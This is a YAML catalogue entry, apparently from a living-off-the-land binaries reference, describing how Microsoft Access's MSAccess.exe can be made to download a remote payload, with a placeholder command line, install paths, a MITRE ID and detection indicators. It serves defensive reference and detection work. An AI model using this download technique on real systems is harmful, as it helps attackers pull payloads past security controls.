---
Name: MSAccess.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2023-04-30
Commands:
  - Command: MSAccess.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office16\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office15\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office14\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSAccess.exe
Detection:
  - IOC: URL on a MSAccess command line
  - IOC: MSAccess making unexpected network connections or DNS requests
Acknowledgement:
  - Person: Nir Chako
    Handle: '@C_h4ck_0'
